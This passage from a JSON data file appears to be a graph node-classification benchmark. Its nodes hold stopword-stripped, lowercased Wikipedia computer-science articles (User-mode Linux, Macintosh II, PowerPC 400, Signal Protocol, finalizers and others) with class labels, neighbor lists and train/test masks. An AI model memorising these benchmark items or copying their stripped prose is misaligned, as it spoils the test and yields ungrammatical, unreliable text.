uml protected memory management unit unlike current uml using skas buggy malicious software inside uml running non-skas host could able read memory space uml processes even uml kernel memory user-mode linux generally considered lower performance competing technologies xen openvz future work adding support x86 virtualization uml may reduce disadvantage often cited strength xen competing technology support thread-local storage tls also supported latest uml kernels xen concentrates virtualizing whole machine thus systems running xen machine really virtual machines uml host machine virtualized way guest systems true virtual machines allows uml guest direct access host filesystems hardware common map host directory e.g /uml/root → uml originally designed x86 instruction set also ported others including ia-64 powerpc",
    "neighbors": [
      4616,
      3082,
      5139,
      10780,
      10785,
      6180,
      9256,
      8242,
      9266,
      4161,
      8772,
      6213,
      8268,
      589,
      593,
      4695,
      10851,
      6244,
      5222,
      10856,
      4207,
      5244,
      11391,
      7812,
      7821,
      4238,
      10382,
      2195,
      2711,
      6808,
      9882,
      1694,
      2723,
      8364,
      10933,
      5815,
      5822,
      5824,
      1736,
      2762,
      8909,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      2278,
      233,
      7403,
      10482,
      2294,
      8439,
      2809,
      8700,
      5378,
      4360,
      1291,
      4367,
      792,
      10016,
      6438,
      295,
      6968,
      7992,
      318,
      3911,
      8520,
      6988,
      10063,
      11606,
      5975,
      11095,
      11097,
      10077,
      10091,
      5486,
      7540,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      9621,
      3990,
      1431,
      8602,
      11678,
      7584,
      1444,
      1445,
      4004,
      935,
      9637,
      4521,
      4011,
      1456,
      1972,
      9667,
      457,
      7134,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      5620,
      8186,
      2044,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 4735,
    "label": 2,
    "text": "Bob_O'Rear:bob o'rear robert bob o'rear former employee microsoft among group eleven early microsoft employees posed iconic company photo taken albuquerque 1978 texan degrees mathematics physics left microsoft 1993 reportedly owns cattle ranch texas net worth reported 100 million o'rear born wellington texas brought perryton rural town 3,500 people texas panhandle grandparents sharecroppers cotton farm o'rear planned physical education teacher later ended graduating university texas el paso bachelor degree mathematics went graduate school university texas austin study mathematics astrophysics 1966 trw redondo beach hired o'rear work air force spy satellite programs also wrote programs optimized trajectory minuteman missiles cold war later 1960s went work nasa helped write program determined trajectory apollo command module reentered earth atmosphere nasa command center neil armstrong landed moon later 1970s o'rear friend trw days founded company called texametrics made automated machinery manufacturing polyurethane bottle caps o'rear worked program analyzed patterns correctly manufactured caps caused incorrectly manufactured parts ejected time o'rear worked hardware software helped later joined microsoft o'rear first joined microsoft 1977 became seventh employee went work company chief mathematician project manager learned programs put together also reworked math code success ms-dos ibm pc o'rear became director international sales marketing microsoft entered agreement seattle computer products acquire marketing rights 86-dos built work intel 8086 would work ibm pc intel 8088 since chips binary compatible work began soon first prototype ibm pc received thanksgiving 1980 o'rear assigned project lead sole programmer despite difficulties hardware software communication delays ibm o'rear produced pc dos v1.0 august 1981 boot sector pc dos v1.0 floppy disk even bears name instead 'microsoft inc text subsequent versions success ms-dos ibm branding pc dos made microsoft fortune 500 company o'rear retired microsoft 1993 o'rear started ranch texas panhandle grew brother o'rear provides financing business structure brother runs operates ranch spends time family pursues hobbies including golf racquetball skiing o'rear also director several boards local businesses invests real estate development retirement joined advisory council college natural sciences university texas el paso alma mater keeps working relationship university microsoft encouraging recruit students university",
    "neighbors": [
      6148,
      2055,
      8301,
      9166,
      8115,
      9907,
      2811
    ],
    "mask": "None"
  },
  {
    "node_id": 4736,
    "label": 1,
    "text": "Valid_time:valid time temporal databases valid time vt time period database fact valid modeled reality december 2011 iso/iec 9075 database language part 2 sql/foundation included clauses table definitions define application-time period tables valid-time tables valid time coined richard t. snodgrass doctoral student database table valid time often represented two extra table-columns startvt endvt time interval closed lower bound open upper bound example valid time time fact true real world example person table gets two extra fields valid-from valid-to specifying person address valid real world april 4 1975 john father proudly registered son birth official insert new entry database stating john lives smallville april 3rd notice although data inserted 4th database states information valid since 3rd official yet know john ever move better place database valid-to filled infinity ∞ resulting entry database december 27 1994 john reports new address bigtown living since august 26 1994 bigtown official change address current entry john doe database adds new one original entry person john doe smallville 3-apr-1975 ∞ updated removed since known john stopped living smallville august 26 1994 valid-to entry filled database contains two entries john doe john dies database updated current entry updated stating john live bigtown longer new entry added officials never report heaven new address database looks like",
    "neighbors": [
      2512,
      4738
    ],
    "mask": "Test"
  },
  {
    "node_id": 4737,
    "label": 4,
    "text": "Installer.app:installer.app installer.app freeware software installer iphone created nullriver later maintained ripdev first released summer 2007 maintained summer 2009 installer allowed users install third-party applications iphone applications directory native applications kept users could install applications variety sources wi-fi umts provided software developers directly onto iphone without requiring computer users could browse lists applications inside installer find ones wanted install june 2009 ripdev dropped support installer favor developing different package manager installer named icy 2.0 firmware released framework changes present applications compiled iphone os 1.2 longer able run 2.0 therefore installer 3 n't available 2.0 vast majority users switched cydia time ripdev russian iphone development took installer project started developing installer 4.0 installer 4.0 finished added quickpwn software payload installer 4.0 gain much popularity installer 3.0 jailbreak users become accustomed using cydia may 2011 team developers called infini-dev recreated installer 4 could run ios 4 although main current repositories compatible cydia longer compatible installer ripdev put old installer repo back online since infini-dev released installer also repos like greek-iphone offer date packages installer slava karpenko announced project work installer 5 slava karpenko revealed infini dev project dropped infini-dev took moved project apptapp team name currently working installer 5 developers working project release date tbd although public beta released july 3 2019",
    "neighbors": [
      9732,
      10470,
      6537,
      811,
      5356,
      5067,
      7983,
      7420,
      4957
    ],
    "mask": "Test"
  },
  {
    "node_id": 4738,
    "label": 1,
    "text": "Transaction_time:transaction time temporal databases transaction time tt time fact stored database considered true december 2011 iso/iec 9075 database language part 2 sql/foundation included clauses table definitions define system-versioned tables transaction-time tables database table transaction interval often represented interval allowing system remove entries using two table-columns starttt endtt time interval closed lower bound open upper bound ending transaction time unknown may considered changed academic researchers rdbms represented changed largest timestamp supported keyword forever convention technically precise term coined richard t. snodgrass doctoral student",
    "neighbors": [
      2512,
      4736
    ],
    "mask": "Test"
  },
  {
    "node_id": 4739,
    "label": 3,
    "text": "Xain'd_Sleena:xain 'd sleena main character xain galactic bounty-hunter must defeat evil forces oppress five different planets player select order play various planets 'official sequence play u.s. version game released 'solar warrior version goes set sequence instead choose planets planet played right horizontal vertical scrolling shooting enemies dodging natural hazards xain crouch double crouch prone jump double jump planets player need kill sub-boss resume certain enemies carry powerup changes default laser gun different weapon different weapons cycled powerups include laser-grenade gun 2-way gun spreadfire gun strong bullet gun respective damage directional firing capabilities end planet player goes battle boss defeated player plants bomb boss base ten seconds escape starship next half planet stage interlude stage player must battle waves enemy ships heading next planet three planets battle asteroid field giant mothership five planets liberated player play longer final stage gigantic metallic fortress facing bosses previously met five planets fighting bosses stage optional halfway stage player plants bomb fortress core 60 seconds reach exit hangar jump starship giving commodore 64 port score 499 points ace compared game firebird game crosswize.. games machine gave atari st commodore 64 zx spectrum ports scores 70 77 86 respectively",
    "neighbors": [
      1776,
      9006
    ],
    "mask": "Train"
  },
  {
    "node_id": 4740,
    "label": 9,
    "text": "SOAP_with_Attachments_API_for_Java:soap attachments api java soap attachments api java saaj provides standard way send xml documents internet java platform saaj enables developers produce consume messages conforming soap 1.1 1.2 specifications soap attachments note used alternative jax-rpc jax-ws soap simple object access protocol created mohsen al-ghosein dave winer bob atkinson box 1998 help microsoft",
    "neighbors": [
      6688,
      1128,
      5677,
      4688,
      10486,
      6328,
      10877,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 4741,
    "label": 3,
    "text": "Macintosh_II:macintosh ii macintosh ii personal computer designed manufactured sold apple computer inc. march 1987 january 1990 first model macintosh ii family first macintosh support color display first introduced basic system 20 mb drive monitor cost 13-inch color monitor 8-bit display card price around price placed competition workstations silicon graphics sun microsystems hewlett-packard macintosh ii designed hardware engineers michael dhuey computer brian berkeley monitor industrial designer hartmut esslinger case eighteen months introduction macintosh ii updated powerful cpu sold macintosh iix early 1989 compact macintosh iicx introduced price similar original macintosh ii beginning 1990 sales stopped altogether motherboard upgrades turn macintosh ii iix macintosh iifx offered apple two common criticisms macintosh introduction 1984 closed architecture lack color rumors color macintosh began almost immediately macintosh ii project begun dhuey berkeley 1985 without knowledge apple co-founder macintosh division head steve jobs opposed features like expansion slots color basis former complicated user experience latter conform wysiwyg since color printers common instead wanted higher-resolution monochrome displays macintosh initially referred little big mac macintosh ii codenamed milwaukee dhuey hometown later went series new names including reno becks cabernet uzi paris jean-louis gassée apple products manager protected semi-clandestine project cancellation jobs fired apple september 1985 project could proceed openly macintosh ii introduced appleworld 1987 conference los angeles low-volume initial shipments starting two months later retailing us 5,498 macintosh ii first modular macintosh model called came horizontal desktop case like many ibm pc compatibles time previous macintosh computers used all-in-one design built-in black-and-white crt macintosh ii drive bays internal hard disk originally 40 mb 80 mb optional second floppy disk drive along macintosh se first macintosh computer use apple desktop bus adb introduced apple iigs keyboard mouse interface primary improvement macintosh ii color quickdraw rom color version graphics language heart machine among many innovations color quickdraw ability handle display size 8-bit color depth multiple monitors color quickdraw included macintosh ii rom relied new 68020 instructions earlier macintoshes could upgraded display color september 1988 shortly introduction macintosh iix apple increased list price macintosh ii 20 cpu macintosh ii built around motorola 68020 processor operating 16 mhz teamed motorola 68881 floating point unit machine shipped socket mmu apple hmmu chip vlsi vi475 chip installed implement virtual memory instead translated 24-bit addresses 32-bit addresses mac os would 32-bit clean system 7 memory standard memory 1 megabyte expandable 8 mb mac ii eight 30-pin simms memory installed groups four called bank bank b original macintosh ii pmmu default relied memory controller hardware map installed memory contiguous address space hardware restriction address space dedicated bank must larger bank b though memory controller designed support 16mb 30-pin simms 128mb ram original macintosh ii roms problems limiting amount ram installed 8mb macintosh iix roms also shipped fdhd upgrade fixed problem though still 32-bit memory manager boot 32-bit addressing mode mac os without assistance mode32 mode32 contained workaround allowed larger simms put bank b pmmu installed case roms boot think computer 8mb less ram mode32 reprograms memory controller dedicate address space bank allowing additional memory bank b accessed since makes physical address space discontiguous pmmu used remap address space contiguous block graphics macintosh ii includes graphics card supports true-color 16.7 million color palette available two configurations 4-bit 8-bit 4-bit model supports 16 colors 640×480 display 256 colors 8-bit video 512×384 display means vram 256 kb 8-bit model supports 256-color video 640×480 display means vram 512 kb size optional ram upgrade requiring 120ns dip chips 4-bit version supports 640×480 8-bit color video card include hardware acceleration drawing operations display apple offered choice two displays 12 black white unit expensive 13 high-resolution color display based sony trinitron technology one display could attached computer objects could easily dragged one screen next third-party displays quickly became available los angeles times reviewer called color spectacular operating system user interface remained black white even color monitors exception apple logo appeared rainbow color storage 5.25-inch 40 mb internal scsi hard disk optional second internal 800 kilobyte 3.5-inch floppy disk drive expansion six nubus slots available expansion least one used graphics card mac ii onboard graphics chipset os n't support headless booting possible connect many six displays macintosh ii filling nubus slots graphics cards another option expansion included mac286 included intel 80286 chip could used ms-dos compatibility original roms macintosh ii contained bug prevented system recognizing one megabyte memory address space nubus card every macintosh ii manufactured approximately november 1987 defect happened slot manager 32-bit clean apple offered well-publicized recall faulty roms released program test whether particular macintosh ii defect result rare find macintosh ii original roms accessories macintosh ii macintosh se first apple computers since apple sold without keyboard instead customer offered choice new adb apple keyboard apple extended keyboard separate purchase dealers could bundle third-party keyboard attempt upsell customer expensive higher-profit extended keyboard audio macintosh ii first macintosh chimes death accompany sad mac logo whenever serious hardware error occurred new extensions featured macintosh ii time a/rose sound manager macintosh ii offered three configurations systems included mouse single 800 kb 3.5-inch floppy disk drive 68551 pmmu available option",
    "neighbors": [
      8207,
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      1592,
      8253,
      576,
      1090,
      4180,
      10838,
      10840,
      9312,
      8806,
      6258,
      10357,
      7286,
      4220,
      10365,
      10878,
      6783,
      7299,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      3241,
      10424,
      7869,
      8893,
      8896,
      5829,
      4807,
      4810,
      9422,
      1744,
      3293,
      9952,
      6884,
      6377,
      2282,
      1772,
      1776,
      10481,
      5384,
      1290,
      781,
      4879,
      784,
      6419,
      3350,
      2839,
      8480,
      10023,
      4910,
      7983,
      11066,
      9022,
      10562,
      10051,
      3911,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      11118,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      5520,
      1428,
      3483,
      2979,
      11171,
      8109,
      1461,
      446,
      9665,
      5058,
      10691,
      1482,
      9166,
      6608,
      8662,
      9174,
      9686,
      8665,
      10199,
      3548,
      9182,
      9700,
      2023,
      5616,
      6129,
      6130,
      10224,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 4742,
    "label": 3,
    "text": "Bit_slicing:bit slicing bit slicing technique constructing processor modules processors smaller bit width purpose increasing word length theory make arbitrary n-bit cpu component modules processes one bit field slice operand grouped processing components would capability process chosen full word-length particular software design bit slicing less died due advent microprocessor recently used alus quantum computers used software technique e.g x86 cpus cryptography bit slice processors usually include arithmetic logic unit alu 1 2 4 8 16 bits control lines including carry overflow signals internal processor non-bitsliced cpu designs example two 4-bit alu chips could arranged side side control lines form 8-bit alu result need power two e.g three 1-bit make 3-bit alu thus 3-bit n-bit cpu 3-bit cpu higher odd-number bits n't manufactured sold volume four 4-bit alu chips could used build 16-bit alu would take eight chips build 32-bit word alu designer could add many slices required manipulate increasingly longer word lengths microsequencer control rom would used execute logic provide data control signals regulate function component alus known bit-slice microprocessor modules bit slicing although called time also used computers large scale integrated circuits lsi predecessor today vlsi very-large-scale integration circuits first bit-sliced machine edsac 2 built university cambridge mathematical laboratory 1956–1958 prior mid-1970s late 1980s debate much bus width necessary given computer system make function silicon chip technology parts much expensive today using multiple simpler thus less expensive alus seen way increase computing power cost effective manner 32-bit architecture microprocessors discussed time production univac 1100 series mainframes one oldest series originating 1950s 36-bit architecture 1100/60 introduced 1979 used nine motorola mc10800 4-bit alu chips implement needed word width using modern integrated circuits time 16-bit processors common expensive 8-bit processors z80 widely used nascent home computer market combining components produce bit slice products allowed engineers students create powerful complex computers reasonable cost using off-the-shelf components could custom-configured complexities creating new computer architecture greatly reduced details alu already specified debugged main advantage bit slicing made economically possible smaller processors use bipolar transistors switch much faster nmos cmos transistors allowed much higher clock rates speed needed example dsp functions matrix transformation xerox alto combination flexibility speed discrete cpus able deliver recent times term bit slicing re-coined matthew kwan refer technique using general purpose cpu implement multiple parallel simple virtual machines using general logic instructions perform single instruction multiple data simd operations technique also known simd within register swar initially reference eli biham 1997 paper fast new des implementation software achieved significant gains performance des using method simplify circuit structure reduce hardware cost quantum computers proposed run mips32 instruction set 50 ghz superconducting 4-bit bit-slice arithmetic logic unit alu 32-bit rapid single-flux-quantum microprocessors demonstrated",
    "neighbors": [
      7173,
      11333,
      8143,
      1776,
      4465,
      10098,
      499,
      11604,
      10485,
      8474,
      3070,
      9599
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4743,
    "label": 3,
    "text": "PowerPC_400:powerpc 400 powerpc 400 family line 32-bit embedded risc processor cores based powerpc power isa instruction set architectures cores designed fit inside specialized applications ranging system-on-a-chip soc microcontrollers network appliances application-specific integrated circuits asics field-programmable gate arrays fpgas set-top boxes storage devices supercomputers applied micro circuits corporation amcc bought assets concerning 400 family cores ibm april 2004 227 million market processors name ibm continues evolving cores supplying design foundry services around cores several cores also available licensing oems ibm synopsys introduced 1994 powerpc 403 one first powerpc processors first one targeted strictly embedded market compared powerpc processors era powerpc 601 powerpc 603 powerpc 604 low end lacking memory management unit mmu floating point unit fpu instance core offered custom chips pre packaged versions including versions mmu speeds ranging 20 80 mhz powerpc 403 used among appliances thin clients set-top boxes raid-controllers network switches printers first tivo used 54 mhz powerpc 403gcx amcc acquired design 403 ibm 2004 chosen market instead focusing 405 440 cores 403 popular also high performance costly applications 1996 ibm released bare bones powerpc core called powerpc 401 single issue three-stage pipeline mmu dma 2 kb instruction 1 kb data l1 caches design contained 85,000 transistors operated 100 mhz drawing 0.1 w less applications using 401 core range set-top boxes telecom switches printers fax machines powerpc 405 released 1998 designed price performance sensitive low-end embedded system-on-a-chip soc designs five-stage pipeline separate 16 kb instruction data l1 caches coreconnect bus auxiliary processing unit apu interface expandability supports clock rates exceeding 400 mhz 405 core adheres current power isa v.2.03 using book iii-e specification amcc ibm developing marketing processors using 405 cores ibm synopsys also offers fully synthesizable core ibm announced plans make specifications powerpc 405 core freely available academic research community powerpc-405-based applications include digital cameras modems set-top boxes ibm stb04xxx processors cellphones gps-devices printers fax machines network cards network switches storage devices service processors servers two 405 cores used xilinx virtex-ii pro virtex-4 fpgas 2004 hifn bought ibm powernp network processors uses 405 cores introduced 1999 powerpc 440 first powerpc core ibm include book e extension powerpc specification also included coreconnect bus technology designed interface parts inside powerpc based system-on-a-chip soc device high-performance core separate 32 kb instruction data l1 caches seven-stage out-of-order dual-issue pipeline supporting speeds 800 mhz l2 caches 256 kb core lacks floating point unit fpu associated four-stage fpu included using apu auxiliary processing unit interface 440 core adheres power isa v.2.03 using book iii-e specification xilinx currently incorporates one two cores depending member family virtex-5 fxt fpga amcc ibm developing marketing stand alone processors using 440 cores ibm synopsys also offers fully synthesized cores processing core blue gene/p supercomputer designed manufactured ibm similar powerpc 440 details disclosed introduced 2006 460 cores similar 440 reach 1.4 ghz developed multi-core applications mind 24 additional digital signal processing dsp instructions cores designed low-power high performance 464-h90 expected draw 0.53 w 1 ghz 460 core adheres power isa v.2.03 using book iii-e specification 470 embedded customizable core adhering power isa v2.05 book iii-e designed ibm together lsi implemented powerpc 476fp 2009 476fp core 32/32 kb l1 cache dual integer units simd capable double precision fpu handles dsp instructions emitting 1.6 w 1.6 ghz 45 nm fabrication process 9 stage order 5-issue pipeline handles speeds 2 ghz supports plb6 bus 1 mb l2 cache 16 cores smp configurations",
    "neighbors": [
      6914,
      4868,
      10501,
      3846,
      6663,
      5642,
      1548,
      1933,
      3472,
      4881,
      7065,
      1563,
      1309,
      3493,
      6949,
      6311,
      8102,
      1321,
      3886,
      9391,
      10543,
      4017,
      5297,
      1461,
      823,
      8120,
      6715,
      9020,
      1725,
      10173,
      1983,
      6207,
      1985,
      8899,
      10180,
      11333,
      3911,
      1480,
      336,
      8530,
      3540,
      342,
      9302,
      11613,
      6878,
      1635,
      8931,
      869,
      10214,
      10985,
      5358,
      10734,
      3185,
      4211,
      5235,
      630,
      8058,
      3323,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 4744,
    "label": 0,
    "text": "Linguatec:linguatec linguatec sprachtechnologien gmbh language technology provider specialized field machine translation speech synthesis speech recognition linguatec founded munich 1996 headquarters pasing linguatec european information society technologies prize three times website using online service voice reader web information read every language means text-to-speech function",
    "neighbors": [
      1890,
      3533,
      3323,
      7164,
      10557
    ],
    "mask": "Test"
  },
  {
    "node_id": 4745,
    "label": 2,
    "text": "Lynne_Jolitz:lynne jolitz lynne greer jolitz born june 30 1961 figure free software founded many startups silicon valley husband william lynne jolitz probably famous work pioneering open source operating systems 386bsd husband founded startup companies involve workstations companies internet multimedia lynne also noted author authority operating systems networking issues lynne internet news media commentator discussing events computer industry wrote frequently byte also holds patents internet technologies semiconductor memory innovations writes technical papers articles currently adviser coolclip network internet startup uses server-based video production engine lynne originally designed tested university california berkeley lynne appeared oracle e-business network presented geek week award years work high-speed networking operating systems design lynne also appeared dvorak ’ realcomputing discussing impact internet broadband received alumni award physics department berkeley work alumni outreach department also active women ’ entrepreneur technology networking groups mentoring girls science technology husband reside los gatos california children rebecca benjamin sarah",
    "neighbors": [
      7552,
      5506,
      1927,
      10761,
      2061,
      9743,
      8725,
      5534,
      1316,
      684,
      4908,
      1839,
      7983,
      1718,
      1080,
      9151,
      9153,
      3651,
      7748,
      10436,
      9927,
      8395,
      850,
      6361,
      9306,
      10202,
      3551,
      607,
      9320,
      873,
      9452,
      633,
      8316
    ],
    "mask": "None"
  },
  {
    "node_id": 4746,
    "label": 5,
    "text": "Signal_Protocol:signal protocol signal protocol formerly known textsecure protocol non-federated cryptographic protocol used provide end-to-end encryption voice calls video calls instant messaging conversations protocol developed open whisper systems 2013 first introduced open-source textsecure app later became signal several closed-source applications claim implemented protocol whatsapp said encrypt conversations billion people worldwide facebook messenger also say offer protocol optional secret conversations skype private conversations protocol combines double ratchet algorithm prekeys triple elliptic-curve diffie–hellman 3-dh handshake uses curve25519 aes-256 hmac-sha256 primitives signal protocol development started trevor perrin moxie marlinspike open whisper systems 2013 first version protocol textsecure v1 based off-the-record messaging otr 24 february 2014 open whisper systems introduced textsecure v2 migrated axolotl ratchet design axolotl ratchet based ephemeral key exchange introduced otr combines symmetric-key ratchet modeled silent circle instant messaging protocol scimp brought support asynchronous communication offline messages major new feature well better resilience distorted order messages simpler support conversations multiple participants axolotl ratchet named critically endangered aquatic salamander axolotl extraordinary self-healing capabilities developers refer algorithm self-healing automatically disables attacker accessing cleartext later messages compromised session key third version protocol textsecure v3 made changes cryptographic primitives wire protocol october 2014 researchers ruhr university bochum published analysis textsecure v3 among findings presented unknown key-share attack protocol general found secure march 2016 developers renamed protocol signal protocol also renamed axolotl ratchet double ratchet algorithm better differentiate ratchet full protocol used name axolotl referring full protocol signal protocol based textsecure v3 additional cryptographic changes october 2016 researchers uk university oxford australia queensland university technology canada mcmaster university published formal analysis protocol concluded protocol cryptographically sound protocol provides confidentiality integrity authentication participant consistency destination validation forward secrecy post-compromise security aka future secrecy causality preservation message unlinkability message repudiation participation repudiation asynchronicity provide anonymity preservation requires servers relaying messages storing public key material signal protocol also supports end-to-end encrypted group chats group chat protocol combination pairwise double ratchet multicast encryption addition properties provided one-to-one protocol group chat protocol provides speaker consistency out-of-order resilience dropped message resilience computational equality trust equality subgroup messaging well contractible expandable membership authentication users manually compare public key fingerprints outside channel makes possible users verify identities avoid man-in-the-middle attack implementation also choose employ trust first use mechanism order notify users correspondent key changes signal protocol prevent company retaining information users communicate therefore differences messaging service providers choose handle information signal privacy policy states recipients identifiers kept signal servers long necessary order transmit message june 2016 moxie marlinspike told intercept closest piece information metadata signal server stores last time user connected server precision information reduced day rather hour minute second october 2018 signal messenger announced implemented sealed sender feature signal reduces amount metadata signal servers access concealing sender identifier sender identity conveyed recipient message encrypted key server done automatically sender recipient contacts access signal profile users also enable option receive sealed sender messages non-contacts people access signal profile contemporaneous wiretap user device and/or signal servers may still reveal device ip address accessed signal server send receive messages certain times open whisper systems first introduced protocol textsecure app later merged encrypted voice calling application called redphone textsecure app renamed signal redphone used zrtp encrypt calls march 2017 signal transitioned new webrtc-based calling system also introduced ability make video calls signal new calling system uses signal protocol end-to-end encryption november 2014 open whisper systems announced partnership whatsapp provide end-to-end encryption incorporating signal protocol whatsapp client platform open whisper systems said already incorporated protocol latest whatsapp client android support clients group/media messages key verification would coming soon april 5 2016 whatsapp open whisper systems announced finished adding end-to-end encryption every form communication whatsapp users could verify keys february 2017 whatsapp announced new feature whatsapp status uses signal protocol secure contents september 2015 g data software launched new messaging app called secure chat used signal protocol g data discontinued service may 2018 september 2016 google launched new messaging app called allo featured optional incognito mode used signal protocol end-to-end encryption march 2019 google discontinued allo favor messages app android october 2016 facebook deployed optional mode called secret conversations facebook messenger provides end-to-end encryption using implementation signal protocol january 2018 open whisper systems microsoft announced addition signal protocol support optional skype mode called private conversations signal protocol influence cryptographic protocols may 2016 viber said encryption protocol custom implementation uses concepts signal protocol forsta developers said app uses custom implementation signal protocol double ratchet algorithm introduced part signal protocol also adopted protocols omemo xmpp extension protocol xep introduced conversations messaging app approved xmpp standards foundation xsf december 2016 xep-0384 matrix open communications protocol includes olm library provides optional end-to-end encryption room-by-room basis via double ratchet algorithm implementation developers wire said app uses custom implementation double ratchet algorithm signal messenger maintains following signal protocol libraries github",
    "neighbors": [
      2050,
      10242,
      4100,
      1036,
      3610,
      10271,
      3105,
      2083,
      9764,
      5677,
      8758,
      9281,
      7238,
      10831,
      8283,
      10850,
      10341,
      9318,
      7794,
      5749,
      8331,
      11408,
      11418,
      3228,
      10405,
      4268,
      7859,
      2228,
      6855,
      2760,
      1738,
      3284,
      728,
      4318,
      3812,
      9451,
      756,
      2804,
      7928,
      251,
      4863,
      5899,
      5391,
      1297,
      1810,
      9511,
      9519,
      3382,
      6982,
      2892,
      11088,
      3422,
      9572,
      9063,
      3955,
      6519,
      3959,
      3460,
      3462,
      10631,
      1941,
      1456,
      10161,
      1978,
      1467,
      8640,
      6602,
      11221,
      9690,
      4063,
      8674,
      7139,
      4068,
      6628,
      503,
      10748,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 4747,
    "label": 2,
    "text": "Finalizer:finalizer computer science finalizer finalize method special method performs finalization generally form cleanup finalizer executed object destruction prior object deallocated complementary initializer executed object creation following allocation finalizers strongly discouraged due difficulty proper use complexity add alternatives suggested instead primarily dispose pattern – see problems finalizers term finalizer primarily used object-oriented functional languages use garbage collection archetype smalltalk contrasted destructor method called finalization languages deterministic object lifetimes archetypically c++ generally exclusive – language either finalizers garbage collected destructors deterministic rare cases language may c++/cli case reference counting instead tracing garbage collection terminology varies technical usage finalizer may also used refer destructors also perform finalization subtler distinctions drawn – see terminology term final also used indicate class inherited unrelated terminology finalizer finalization versus destructor destruction varies authors sometimes unclear common usage destructor method called deterministically object destruction archetype c++ destructors finalizer called non-deterministically garbage collector archetype java codice_1 methods languages implement garbage collection via reference counting terminology varies languages objective-c perl using destructor languages python using finalizer per spec python garbage collected reference cpython implementation uses reference counting reflects fact reference counting results semi-deterministic object lifetime objects part cycle objects destroyed deterministically reference count drops zero objects part cycle destroyed non-deterministically part separate form garbage collection certain narrow technical usage constructor destructor language-level terms meaning methods defined class initializer finalizer implementation-level terms meaning methods called object creation destruction thus example original specification c language referred destructors even though c garbage-collected specification common language infrastructure cli implementation runtime environment common language runtime clr referred finalizers reflected c language committee notes read part c compiler compiles destructors ... probably instance finalizer terminology confusing thus recent versions c spec refer language-level method finalizers another language make terminology distinction d. although classes garbage collected cleanup functions called destructors finalization primarily used cleanup release memory resources deallocate memory allocated via manual memory management clear references reference counting used decrement reference counts release resources particularly resource acquisition initialization raii idiom unregister object amount finalization varies significantly languages extensive finalization c++ manual memory management reference counting deterministic object lifetimes often finalization java non-deterministic object lifetimes often implemented tracing garbage collector also possible little explicit user-specified finalization significant implicit finalization performed compiler interpreter runtime common case automatic reference counting cpython reference implementation python automatic reference counting apple implementation objective-c automatically break references finalization finalizer include arbitrary code particularly complex use automatically return object object pool memory deallocation finalization common languages like c++ manual memory management standard also occurs managed languages memory allocated outside managed heap externally language java occurs java native interface jni codice_2 objects new i/o nio latter cause problems due garbage collector able track external resources collected aggressively enough cause out-of-memory errors due exhausting unmanaged memory – avoided treating native memory resource using dispose pattern discussed finalizers generally much less necessary much less used destructors much less necessary garbage collection automates memory management much less used generally executed deterministically – may called timely manner even execution environment predicted – thus cleanup must done deterministic way must instead done method frequently manually via dispose pattern notably java python guarantee finalizers ever called thus relied cleanup due lack programmer control execution usually recommended avoid finalizers trivial operations particular operations often performed destructors usually appropriate finalizers common anti-pattern write finalizers destructors unnecessary ineffectual due differences finalizers destructors particularly common among c++ programmers destructors heavily used idiomatic c++ following resource acquisition initialization raii idiom programming languages use finalizers include c++/cli c clean go java python syntax varies significantly language java finalizer method called codice_1 overrides codice_4 method python finalizer method called codice_5 perl finalizer method called codice_6 c finalizer called destructor earlier versions standard method whose name class name codice_7 prefixed codice_8 – syntax c++ destructor methods originally called destructors analogy c++ despite different behavior renamed finalizers due confusion caused c++/cli destructors finalizers destructor method whose name class name codice_7 prefixed codice_8 c++ finalizer method whose name class name codice_11 prefixed codice_12 go finalizers applied single pointer calling codice_13 function standard library finalizer called object garbage collected – object become garbage unreachable memory deallocated finalization occurs non-deterministically discretion garbage collector might never occur contrasts destructors called deterministically soon object longer use always called except case uncontrolled program termination finalizers frequently instance methods due needing object-specific operations garbage collector must also account possibility object resurrection commonly done first executing finalizers checking whether objects resurrected aborting destruction additional check potentially expensive – simple implementation re-checks garbage even single object finalizer – thus slows complicates garbage collection reason objects finalizers may collected less frequently objects without finalizers certain cycles exacerbating problems caused relying prompt finalization resource leaks object resurrected question whether finalizer called next destroyed – unlike destructors finalizers potentially called multiple times finalizers called resurrected objects objects may repeatedly resurrect indestructible occurs cpython implementation python prior python 3.4 clr languages c avoid many languages including java objective-c least recent apple implementations python python 3.4 objects finalized requires tracking object finalized yet cases notably clr languages like c finalization tracked separately objects objects repeatedly registered deregistered finalization finalizers cause significant number problems thus strongly discouraged number authorities problems include finalizers may fail run due object remaining reachable beyond expected garbage either due programming errors due unexpected reachability example python catches exception exception caught interactive mode keeps reference stack frame exception raised keeps objects referenced stack frame alive finalizers superclass also slow garbage collection subclass finalizer potentially refer fields subclass thus field garbage collected following cycle finalizer run avoided using composition inheritance common anti-pattern use finalizers release resources analogy resource acquisition initialization raii idiom c++ acquire resource initializer constructor release finalizer destructor work number reasons basically finalizers may never called even called may called timely manner – thus using finalizers release resources generally cause resource leaks finalizers called prescribed order resources often need released specific order frequently opposite order acquired also finalizers called discretion garbage collector often called managed memory pressure little managed memory available regardless resource pressure – scarce resources held garbage plenty managed memory available garbage collection may occur thus reclaiming resources thus instead using finalizers automatic resource management garbage-collected languages one instead must manually manage resources generally using dispose pattern case resources may still acquired initializer called explicitly object instantiation released dispose method dispose method may called explicitly implicitly language constructs c codice_14 java codice_15-with-resources python codice_16 however certain cases dispose pattern finalizers used releasing resources primarily found clr languages c finalization used backup disposal resource acquired acquiring object queued finalization resource released object destruction even resource released manual disposal languages deterministic object lifetimes notably c++ resource management frequently done tying resource possession lifetime object lifetime acquiring resources initialization releasing finalization known resource acquisition initialization raii ensures resource possession class invariant resources released promptly object destroyed however languages non-deterministic object lifetimes – include major languages garbage collection c java python – work finalization may timely may happen thus resources may released long time even causing resource leaks languages 